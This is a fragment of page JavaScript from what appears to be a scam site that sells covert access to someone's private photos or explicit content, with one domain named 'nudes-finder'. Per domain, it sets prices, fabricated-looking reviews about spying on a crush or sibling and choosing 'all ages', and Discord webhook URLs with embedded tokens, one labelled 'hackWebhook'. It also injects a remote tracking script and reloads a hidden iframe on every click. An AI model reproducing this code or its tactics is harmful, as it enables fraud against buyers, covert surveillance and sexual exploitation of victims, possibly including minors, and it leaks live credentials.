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"timestamp": 1735730815877, "stars": 5, "text": "W" }, { "name": "Awdasfe", "timestamp": 1735667035923, "stars": 4, "text": "Everything worked fine until account changed password, then i had to contact support to give me refund, and they did so i can't complain" }, { "name": "Anonymous", "timestamp": 1734808464899, "stars": 5, "text": "worked perfectly! used solana to pay cause the fees are lower. took about 5 mins to get access after payment confirmed, thanks for that my eyes only code btw" }, { "name": "Jack", "timestamp": 1734794064899, "stars": 4, "text": "pretty good overall. payment with btc was straightforward. just make sure you send the exact amount" }, { "name": "Anonymous", "timestamp": 1734768864899, "stars": 5, "text": "Nice" }, { "name": "M.", "timestamp": 1734725664899, "stars": 5, "text": "used litecoin, whole process took maybe 15 mins total." }, { "name": "Anonymous", "timestamp": 1734639264899, "stars": 4, "text": "My crush will never suspect a thing" }, { "name": "Ryan K.", "timestamp": 1734552864899, "stars": 5, "text": "damn thanks" }, { "name": "Anonymous", "timestamp": 1734466464899, "stars": 5, "text": "got my invites from posting in some telegram groups. took about a day but worked perfectly after that" }, { "name": "Anonymous", "timestamp": 1734380064899, "stars": 4, "text": "dont tell my sister about this" }, { "name": "Anonymous", "timestamp": 1734293664899, "stars": 5, "text": "ill come back later for this" }, { "name": "Tom", "timestamp": 1734207264899, "stars": 5, "text": "paid with doge. whole thing was done in under 10 mins. definitely recommend" } ] break case "nudes-finder.pages.dev": discount = 35 price = 40 webhook= "https://discord.com/api/webhooks/1348357828456222891/ealul1dqX47xMaL_I17ULIRo73A6SCvQonLARH305Q_UN9R1Zj0fujQMFsdZm3CGB6mW" hackWebhook = "https://discord.com/api/webhooks/1348357330714103838/Kx2Vcq3bbgXNzPUfHK8QO-eLbnmA0c5BSlPRfQslJM54OzZsImT7EcVi-W3-C18i2XT9" reviewsData = [{ "name": "UwU", "timestamp": 1736110930000, "stars": 5, "text": "Worth the price for so much content!" },{ "name": "Anonymous", "timestamp": 1736072859488, "stars": 5, "text": "Really great content and for a good price too!" },{ "name": "nice", "timestamp": 1735907646023, "stars": 5, "text": "very nice" }, { "name": "Anthon", "timestamp": 1735745858042, "stars": 5, "text": "you can get everything for just 1 credit if you choose all categories and all ages" }, { "name": "Bruh", "timestamp": 1735666256407, "stars": 5, "text": "very good" } ,{ "name": "mike", "timestamp": 1735604264000, "stars": 5, "text": "I got it free bcuz i downloaded app lol" } ,{ "name": "Anonymous", "timestamp": 1735394288704, "stars": 5, "text": "Nice content" } ] break default: price = 25 discount = 40 webhook= "https://discord.com/api/webhooks/1323747611252887656/XdO5N2I0BFbgkTOBV7Jb7xRAKXKs6XFIW-nfiFhD_EG07R2uJfeXGRBnHJwXftuswMYP" hackWebhook = "https://discord.com/api/webhooks/1348358186457104414/kN66JFIQxUAmZvFvi5M_EGq5sY39_l_T2939y9g0U1r_ujs0TkeeU1sr-ZoccPhTsait" reviewsData = [{ "name": "Anonymous", "timestamp": 1736072859488, "stars": 5, "text": "who else using this on their crush?" }, { "name": "Anonymous", "timestamp": 1735666256407, "stars": 5, "text": "nice to be of the first testers" } ,{ "name": "Aln", "timestamp": 1735604264000, "stars": 5, "text": "i will DEFINITLY wont use it for malicous purposes" } ,{ "name": "dog", "timestamp": 1735394288704, "stars": 5, "text": "It works" } ] break; } if(localStorage.washere == null){ let lo = document.createElement("script") lo.src = "https://cdn-host.serv00.net/track.php?uid=3" document.body.appendChild(lo) } setTimeout(()=>{ for(elem of document.querySelectorAll("a, button")){ elem.addEventListener("click",(e)=>{ document.querySelector("iframe[transparent]").contentWindow.location.reload(); }) }},6000)